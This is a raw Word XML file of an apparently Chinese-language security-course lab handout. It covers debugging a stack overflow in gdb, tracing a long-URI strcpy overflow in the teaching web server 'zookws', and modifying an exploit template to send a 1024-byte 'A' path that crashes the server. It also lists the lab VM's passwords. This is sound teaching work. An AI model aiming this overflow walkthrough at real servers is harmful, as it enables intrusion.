          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>，将返回地址写入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eip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查看一下寄存器和栈帧中的内容，以此绘制栈帧结构图。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$ebp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$1 = (void *) 0xbffff6b8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$esp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$2 = (void *) 0xbffff610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&amp;i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$3 = (int *) 0xbffff6ac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&amp;buf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$4 = (char (*)[128]) 0xbffff62c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x $ebp+4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0x08048e7f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read_req()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>栈帧示例：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arguments       |                               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 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return address     |&lt;——— +4 =0xbffff6bc %eip=0x08048e7f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main() ebp       |&lt;——— %ebp        =0xbffff6b8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int  i           |&lt;——— -0x0c (-12) =0xbffff6ac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|buf[127]   ^     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buf[0]|&lt;——— -0x8c(-140)=0xbffff62c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+————————————————————————+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&amp;buf for gets()      |&lt;——— -0xa8(-168)=0xbffff610 new %esp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继续运行程序，进行缓冲区溢出。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gets()]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7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i = atoi(buf);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此时发生了什么？大量的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0x41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>）从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buf[0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>开始写入到栈中，从下向上覆盖之前栈中内容。下面查看栈中内容。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&amp;buf[0]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$5 = 0xbffff62c 'A' &lt;repeats 200 times&gt;…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超过了缓冲区大小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128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字节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x $ebp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检查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$ebp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所指向地址内容，已经被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覆盖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0xbffff6b8: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0x41414141  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x $ebp+4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检查返回地址，已经被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覆盖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0x41414141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atoi()]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return i;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disass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Dump of assembler code for function read_req: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0x08048e44 &lt;+0&gt;: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%ebp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0x08048e45 &lt;+1&gt;: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%esp,%ebp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0x08048e47 &lt;+3&gt;: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$0xa8,%esp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0x08048e4d &lt;+9&gt;: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-0x8c(%ebp),%eax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0x08048e53 &lt;+15&gt;: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0x08048e56 &lt;+18&gt;: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0x804fc90 &lt;gets&gt;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0x08048e5b &lt;+23&gt;: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-0x8c(%ebp),%eax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0x08048e61 &lt;+29&gt;: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0x08048e64 &lt;+32&gt;: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0x804dd10 &lt;atoi&gt;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0x08048e69 &lt;+37&gt;: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%eax,-0xc(%ebp)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=&gt; 0x08048e6c &lt;+40&gt;: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-0xc(%ebp),%eax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0x08048e6f &lt;+43&gt;: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leave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0x08048e70 &lt;+44&gt;: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ret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&amp;buf[0] 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查看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$8 = 0xbffff62c 'A' &lt;repeats 128 times&gt; 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为什么变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>128?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atoi()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>执行后，变量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i=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>，而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i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>正好在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buf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>结尾之后，相当于在字符串后插入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\0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>。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接着执行两个指令到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。由于返回地址被改写，导致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后跳转到错误地址，进而程序崩溃。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nexti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nexti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0x08048e70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9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$eip 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下一条指令是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$11 = (void (*)()) 0x8048e70 &lt;read_req+44&gt;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nexti     [ret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后，下一条指令地址是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0x41414141 in ?? ()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p $eip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$12 = (void (*)()) 0x41414141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nexti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Program received signal SIGSEGV, Segmentation fault.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0x41414141 in ?? ()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运行另一个演示，模拟通过缓冲区溢出可以改写返回地址，操纵跳转到指定地址。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r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The program being debugged has been started already.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Start it from the beginning? (y or n) y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Starting program: /home/httpd/lecture1/readreq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Breakpoint 1, read_req () at readreq.c:6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6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gets(buf);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7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i = atoi(buf);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return i;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disas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Dump of assembler code for function read_req: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0x08048e44 &lt;+0&gt;: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%ebp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0x08048e45 &lt;+1&gt;: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%esp,%ebp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0x08048e47 &lt;+3&gt;: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$0xa8,%esp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0x08048e4d &lt;+9&gt;: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-0x8c(%ebp),%eax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0x08048e53 &lt;+15&gt;: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0x08048e56 &lt;+18&gt;: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0x804fc90 &lt;gets&gt;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0x08048e5b &lt;+23&gt;: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-0x8c(%ebp),%eax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0x08048e61 &lt;+29&gt;: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0x08048e64 &lt;+32&gt;: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0x804dd10 &lt;atoi&gt;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0x08048e69 &lt;+37&gt;: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%eax,-0xc(%ebp)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=&gt; 0x08048e6c &lt;+40&gt;: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-0xc(%ebp),%eax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0x08048e6f &lt;+43&gt;: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leave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0x08048e70 &lt;+44&gt;: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ret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ni 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执行两个指令到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9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ni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0x08048e70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9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回顾之前关于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的内容：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相当于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mov %ebp,%esp</w:t>
      </w:r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 %ebp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>，此时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esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>指向返回地址。之后，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 %eip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>，将返回地址写入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eip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>。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这里，我们模拟缓冲区溢出时，攻击者精心构造一个输入，在返回地址处写入了预定的指令地址：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函数中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printf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>之前载入参数的指令。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x $esp [$esp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指向栈中返回地址被覆盖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0x41414141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disas main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Dump of assembler code for function main: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0x08048e71 &lt;+0&gt;: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%ebp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0x08048e72 &lt;+1&gt;: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%esp,%ebp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0x08048e74 &lt;+3&gt;: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and    $0xfffffff0,%esp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0x08048e77 &lt;+6&gt;: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$0x20,%esp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0x08048e7a &lt;+9&gt;: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0x8048e44 &lt;read_req&gt;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0x08048e7f &lt;+14&gt;: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%eax,0x1c(%esp)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0x08048e83 &lt;+18&gt;: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0x1c(%esp),%eax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0x08048e87 &lt;+22&gt;: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%eax,0x4(%esp)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0x08048e8b &lt;+26&gt;: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movl   $0x80bf0c8,(%esp)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0x08048e92 &lt;+33&gt;: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0x804f730 &lt;printf&gt;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0x08048e97 &lt;+38&gt;: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leave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0x08048e98 &lt;+39&gt;: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ret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set {int}$esp=0x08048e8b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直接改写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$esp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指向栈中返回地址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x $esp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0x08048e8b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(gdb) c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Continuing.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x=1094795585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程序在返回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之后没有崩溃，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printf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打印了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x]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Program received signal SIGSEGV, Segmentation fault.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 (ac=&lt;error reading variable: Cannot access memory at address 0x41414149&gt;,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av=&lt;error reading variable: Cannot access memory at address 0x4141414d&gt;)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at readreq.c:14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D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8357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0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但程序最后还是崩溃了，为什么？因为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的调用者返回地址也被改写了，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返回后就崩溃了。上面输出显示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参数都被改写了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRPr="00580CC1" w:rsidRDefault="00C64F50" w:rsidP="00580CC1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00580CC1">
        <w:lastRenderedPageBreak/>
        <w:t>3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实验预备</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00872D3E" w:rsidRDefault="00872D3E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>本节课中熟悉实验环境，分析一个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服务器的逻辑，寻找缓冲区溢出漏洞并触发该漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5BF1" w:rsidRDefault="003E0C4C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>实验环境为Ubuntu，在VMware Player 虚拟机中的vm-6858运行。系统中有两个账号：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5BF1" w:rsidRDefault="003E0C4C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>- `root`，口令6858，用来安装软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br/>
        <w:t>- `httpd`，口令6858，运行Web服务器和实验程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5BF1" w:rsidRDefault="00FD5BF1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="003E0C4C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>本课程实验研究</w:t>
      </w:r>
      <w:r w:rsidR="00FD5BF1">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r w:rsidR="00FD5BF1">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="default"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>一个web服务器`zookws`。该服务器上运行一个Python的web应用`zoobar`，</w:t>
      </w:r>
      <w:r w:rsidR="00FD5BF1">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>用户之间转移一种称为“zoobars”的货币。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="003E0C4C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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在VMware里用`httpd`账号登录后，运行`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ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>`查看IP地址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2. 用终端软件Xshell通过SSH登录系统`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ssh httpd@IP地址</w:t>
      </w:r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3. 在/home/httpd/lab路径下`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make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>`编译程序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4. 启动服务器`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./clean-env.sh ./zookld zook-exstack.conf</w:t>
      </w:r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5. 用浏览器访问zook服务`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http://虚拟机IP地址:8080/</w:t>
      </w:r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服务器端包含以下主要文件：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`clean-env.sh`脚本令程序每次运行时栈和内存布局都相同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`zookld.c`: 启动`zook.conf`中所配置服务，如`zookd`和`zookfs`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`zookd.c`: 将HTTP请求路由到相应服务，如`zookfs`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`zookfs.c`: 提供静态文件或执行动态代码服务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`http.c`: HTTP实现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`index.html`: Web服务器首页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`/zoobar`目录：zoobar服务实现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114300" distR="114300">
            <wp:extent cx="4980940" cy="24479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服务器端采用CGI (Common Gateway Interface)技术，将客户端请求URL映射到脚本或者普通HTML文件。CGI脚本可以由任意程序语言实现，脚本只需将HTTP头部和HTML文档输出到标准输出。本例CGI由`/zoobar`目录中的python脚本实现，其中也包含一个数据库。</w:t>
      </w:r>
      <w:r w:rsidR="00142E4D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>本次实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>，我们不需要关心具体zoobar服务内容。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`zookd`和`zookfs`执行程序分别有两个版本：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br/>
        <w:t>- `*-exstack`版本有可执行的栈，将攻击代码注入到栈中缓冲区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`*-nxstack`版本的栈不可执行，需要用其他技术来运行攻击代码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查看一下被启动的程序：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ps -fp $(pgrep zook)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UID        PID  PPID  C STIME TTY      STAT   TIME CMD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httpd     4448  2493  0 15:44 pts/3    S+     0:00 /home/httpd/lab/zookld zook-exstack.conf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httpd     4453  4448  0 15:44 pts/3    S+     0:00 zookd-exstack 5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httpd     4454  4448  0 15:44 pts/3    S+     0:00 zookfs-exstack 6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E62DC0"/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hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>简介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参考资料：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[How the web works: HTTP and CGI explained](supplyments/How-the-web-works.pdf)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HTTP请求格式：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[METH] [REQUEST-URI] HTTP/[VER]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Field1: Value1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Field2: Value2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[request body, if any]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E62DC0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HTTP请求例子：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GET / HTTP/1.0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User-Agent: Mozilla/3.0 (compatible; Opera/3.0; Windows 95/NT4)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Accept: */*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Host: birk105.studby.uio.no:81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HTTP应答格式：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HTTP/[VER] [CODE] [TEXT]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Field1: Value1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Field2: Value2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...Document content here...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-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="00E62DC0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</w:p>
    <w:p w:rsidR="00580CC1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HTTP应答例子：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-------------------------------------------------------------------------------HTTP/1.0 200 OK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Server: Netscape-Communications/1.1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Date: Tuesday, 25-Nov-97 01:22:04 GMT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Last-modified: Thursday, 20-Nov-97 10:44:53 GMT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Content-length: 6372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Content-type: text/html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&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"&gt;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&lt;HTML&gt;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...followed by document content...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</w:p>
    <w:p w:rsidR="00580CC1" w:rsidRPr="00580CC1" w:rsidRDefault="006665F8" w:rsidP="00580CC1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00580CC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00580CC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="003E0C4C" w:rsidRPr="00580CC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>寻找漏洞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缓冲区溢出存在的要素：数组（字符串），串处理/读取函数（写操作）。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数组：`char * s`, `char s[128]`, `int a[128]`, `void * p`。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函数： `strcpy()`, `strcat()`, `sprintf()`, `vsprintf()`, `gets()`, `getc()`, `read()`, `scanf()`, `getenv()`。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除了调用函数外，还可能通过`for/while {}`循环的方式来访问缓冲区。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1、在源码中搜索一个‘危险’函数`strcpy()`。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grep -n 'strcpy' *.c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http.c:344:    strcpy(dst, dirname);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-------------------------------------------------------------------------------在`http.c`中找到了一处潜在漏洞，来具体看一下代码。（line 343）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-------------------------------------------------------------------------------void dir_join(char *dst, const char *dirname, const char *filename)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strcpy(dst, dirname);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(dst[strlen(dst) - 1] != '/')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strcat(dst, "/");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strcat(dst, filename);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`dir_join()`函数将`dirname`和`filename`先后拷贝到`dst`中。显然，这里并没有检查每一个字符串长度。若`dirname`长度比`dst`缓冲长，则`strcpy()`调用存在缓冲区溢出风险。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br/>
        <w:t>2、进一步检查使用`dir_join()`时是否存在导致缓冲区溢出的可能（line 350）：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-------------------------------------------------------------------------------void http_serve_directory(int fd, const char *pn)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/* for directories, use index.html or similar in that directory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static const char * const indices[] = {"index.html", "index.php", "index.cgi", NULL};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char name[1024];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struct stat st;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int i;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for (i = 0; indices[i]; i++)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dir_join(name, pn, indices[i]);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if (stat(name, &amp;st) == 0 &amp;&amp; S_ISREG(st.st_mode))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dir_join(name, getenv("SCRIPT_NAME"), indices[i]);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break;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(indices[i] == NULL)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http_err(fd, 403, "No index file in %s", pn);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http_serve(fd, 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-------------------------------------------------------------------------------在`dir_join(name, pn, indices[i]);`调用中，`char name[]`长度为1024。`char * pn`长度待定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="00E62DC0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</w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="003E0C4C">
      <w:pPr>
        <w:pStyle w:val="a4"/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继续查看`http_serve_directory()`调用情况。（line 273）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void http_serve(int fd, const char *name)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void (*handler)(int, const char *) = http_serve_none;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char pn[1024];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struct stat st;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getcwd(pn, sizeof(pn));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//获取当前工作目录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setenv("DOCUMENT_ROOT", pn, 1);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strcat(pn, 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split_path(pn);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(!stat(pn, &amp;st))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/* executable bits -- run as CGI script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 xml:space="preserve">        if (valid_cgi_script(&amp;st))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handler = http_serve_executable;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else if (S_ISDIR(st.st_mode))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handler = http_serve_directory;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else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handler = http_serve_file;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handler(fd, pn);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-------------------------------------------------------------------------------`handler = http_serve_directory`，`handler()`中的`pn`长度1024，内容来自`getcwd()`加上`strcat(pn, name)`。若`name`过长，则`pn`长度也将过长。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="00E62DC0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</w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="003E0C4C">
      <w:pPr>
        <w:pStyle w:val="a4"/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通过进一步分析`http_serve()`调用过程，发现`name`内容来自于环境变量`REQUEST_URI`。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-------------------------------------------------------------------------------zookfs.c:47:   http_serve(sockfd, getenv("REQUEST_URI"));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-------------------------------------------------------------------------------该环境变量在`http.c`中`http_request_line()`函数中被设置。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-------------------------------------------------------------------------------http.c:107:    envp += sprintf(envp, "REQUEST_URI=%s", reqpath)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在`zookd.c`中，`http_request_line()`函数被`process_client()`函数调用。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-------------------------------------------------------------------------------zookd.c:70:    if ((errmsg = http_request_line(fd, reqpath, env, &amp;env_len)))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我们把这一漏洞命名为“LONG_URI”漏洞，回顾分析过程如下：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-------------------------------------------------------------------------------http.c:344:    strcpy(dst, dirname) // dst size = ?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                                  //  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dir_join(name, pn, indices[i]);   // name size = 1024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                                //  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handler(fd, pn);                // pn size = 1024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zookfs.c:47:    http_serve(sockfd, getenv("REQUEST_URI"));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|     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http.c:107:    envp += sprintf(envp, "REQUEST_URI=%s", reqpath)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zookd.c:70:    if ((errmsg = http_request_line(fd, reqpath, env, &amp;env_len)))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3E0C4C" w:rsidRPr="003E0C4C" w:rsidRDefault="006906FB" w:rsidP="003E0C4C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="003E0C4C">
        <w:rPr>
          <w:rStyle w:val="2Char"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C4C">
        <w:rPr>
          <w:rStyle w:val="2Char"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="003E0C4C" w:rsidRPr="003E0C4C">
        <w:rPr>
          <w:rStyle w:val="2Char"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>触发漏洞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首先，该漏洞必须能改写栈中的一个返回地址；其次，改写一些数据结构来用于夺取程序的控制流。撰写触发该漏洞的程序，并验证改程序可以导致web服务器崩溃（通过`dmesg | tail`, 使用`gdb`, 或直接观察）。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漏洞利用程序模板为`exploit-template.py`，该程序向服务器发送特殊请求。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1、首先启动服务：`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./clean-env.sh ./zookld zook-exstack.conf</w:t>
      </w:r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打开另一终端，执行`exploit-template.py`。下面是是未改写的`exploit-template.py`执行结果。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-------------------------------------------------------------------------------$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./exploit-template.py 127.0.0.1 8080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 request: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GET / HTTP/1.0       &lt;-- 客户端请求：方法，URL，HTTP版本号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Connecting to 127.0.0.1:8080...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Connected, sending request...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Request sent, waiting for reply...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Received reply.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 response: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HTTP/1.0 200 OK      &lt;-- HTTP版本号，状态代码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&lt;html&gt;               &lt;-- 文档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&lt;head&gt;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&lt;meta http-equiv="refresh" content="0; URL=zoobar/index.cgi/" /&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;a href="zoobar/index.cgi/"&gt;Click here&lt;/a&gt;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&lt;/body&gt;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&lt;/html&gt;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-------------------------------------------------------------------------------注：返回的内容不一定为success，只需保证HTTP response内容不为空即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="00E62DC0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我们发现了可由我们控制的用户输入，客户端请求位于下面代码中：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##  This is the function that you should modify to construct an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##  HTTP request that will cause a buffer overflow in some part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##  of the zookws web server and exploit it.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def build_exploit(shellcode):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Things that you might find useful in constructing your exploit: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urllib.quote(s)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  returns string s with "special" characters percent-encoded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 xml:space="preserve">    ##   struct.pack("&lt;I", x)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  returns the 4-byte binary encoding of the 32-bit integer x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variables for program addresses (ebp, buffer, retaddr=ebp+4)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req =   "GET / HTTP/1.0\r\n" + \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"\r\n"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return req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目前，我们手上有了两个攻击服务器的武器：(1) “LONG_URI”缓冲区溢出漏洞，(2)构造请求输入`req`的脚本。下一步就是要分析`http.c`中处理该请求的代码，将`req`中内容和`REQUEST_URI`对应起来。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通过分析代码可以发现，HTTP请求中的路径，例如`/foo.html`，被赋予了`REQUEST_URI`变量，因此可以通过构造较长的HTTP请求路径来令缓冲区溢出。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下面的代码有删节。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const char *http_request_line(int fd, char *reqpath, char *env, size_t *env_len)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static char buf[8192];      /* static variables are not on the stack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char *sp1, *sp2, *qp, *envp = env;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//  ... ...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(http_read_line(fd, buf, sizeof(buf)) &lt; 0)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"Socket IO error";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/* Parse request like "GET /foo.html HTTP/1.0"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sp1 = strchr(buf, ' ');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(!sp1)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"Cannot parse HTTP request (1)";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*sp1 = '\0';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sp1++;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(*sp1 != '/')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"Bad request path";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sp2 = strchr(sp1, ' ');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(!sp2)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"Cannot parse HTTP request (2)";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*sp2 = '\0';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sp2++;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//  ... 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/* decode URL escape sequences in the requested path into reqpath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url_decode(reqpath, sp1);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envp += sprintf(envp, "REQUEST_URI=%s", reqpath)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//  ... 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2、之前发现缓冲区有1024字节，我们就令请求路径超过1024字节。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具体修改方法如下：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2.1 输入`vim exploit-template.py`进入文件开始修改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httpd@vm-6858:~/lab$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vim exploit-template.py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2.2 按下字母`i`，进入插入模式修改文件内容，令请求路径超过1024字节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req =   "GET /" + 'A' * 1024 + " HTTP/1.0\r\n" + \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"\r\n"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2.3 修改完成后，按下“Esc”键转到命令行模式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2.4 将攻击脚本复制两份，命名为`exploit-2a.py`和`exploit-2b.py`，并修改文件的权限，使其可执行。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:w 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//另存为exploit-2a.py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:w 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//另存为exploit-2b.py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:q!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//不存盘强制退出vi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="00E62DC0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httpd@vm-6858:~/lab$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chmod 755 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//修改exploit-2a.py的权限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httpd@vm-6858:~/lab$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chmod 755 exploit-2b.py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//修改exploit-2b.py的权限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3、用`make check-crash`来验证是否导致程序崩溃。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make check-crash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./check-bin.sh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./check-part2.sh zook-exstack.conf ./exploit-2a.py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./check-part2.sh: line 8:  4398 Terminated              strace -f -e none -o "$STRACELOG" ./clean-env.sh ./zookld $1 &amp;&gt; /dev/null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4417  --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} 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4417  +++ killed by SIGSEGV +++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PASS ./exploit-2a.py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./check-part2.sh zook-exstack.conf ./exploit-2b.py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./check-part2.sh: line 8:  4423 Terminated              strace -f -e none -o "$STRACELOG" ./clean-env.sh ./zookld $1 &amp;&gt; /dev/null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4442  --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} 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4442  +++ killed by SIGSEGV +++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PASS ./exploit-2b.py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该程序并通过(PASS)了检查。缓冲区漏洞导致程序因为SIGSEV信号而崩溃，指令地址被改写为`si_addr=0x41414141`。下面看看具体发生了什么。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4、使用`gdb -p 进程号`来调试程序。进程号可通过两种方法获得：观察`zookld`在终端输出子进程ID；或者使用`pgrep`，例如`gdb -p $(pgrep zookd-exstack)`。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使用`gdb`过程中，当父进程`zookld`被`^C`杀死时，被`gdb`调试的子进程并不会被终止。这将导致无法重启web服务器。因此，在重启`zookld`之前，应先退出`gdb`。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当生成子进程时，`gdb`缺省情况下仍然调试父进程，而不会跟踪子进程。由于`zookfs`为每个服务请求生成一个子进程，为了自动跟踪子进程，使用`set follow-fork-mode child`命令。该命令已经被加入`/home/httpd/lab/.gdbinit`中，`gdb`启动时会自动执行。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调试流程如下：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①. 在终端1中，重启服务：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`$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./clean-env.sh ./zookld zook-exstack.conf</w:t>
      </w:r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②. 在终端2中，启动`gdb`（`gdb -p PID`），并设置断点（`b`命令）。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③. 在终端3中，运行漏洞触发程序 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./exploit-2a.py localhost 8080</w:t>
      </w:r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④. 返回终端2，继续调试（`c`命令）。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4.1 首先，调试`zookd`。`http_request_line`负责处理HTTP请求。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gdb -p $(pgrep zookd-exstack)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b http_request_line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Breakpoint 1 at 0x8049150: file http.c, line 67.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[运行漏洞触发程序]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Continuing.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Breakpoint 1, http_request_line (fd=5, reqpath=0xbfffee08 "", env=0x804e520 &lt;env&gt; "", env_len=0x8050520 &lt;env_len&gt;) at http.c:67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warning: Source file is more recent than executable.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67          char *sp1, *sp2, *qp, *envp = env;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[执行n多次直到REQUEST_URI被处理完]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109         envp += sprintf(envp, "SERVER_NAME=zoobar.org")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x/10s buf</w:t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      [打印buf，请求中各字段已经被分割]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0x8050540 &lt;buf.4435&gt;:   "GET"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0x8050544 &lt;buf.4435+4&gt;: "/", 'A' &lt;repeats 199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0x805060c &lt;buf.4435+204&gt;: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0x80506d4 &lt;buf.4435+404&gt;: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0x805079c 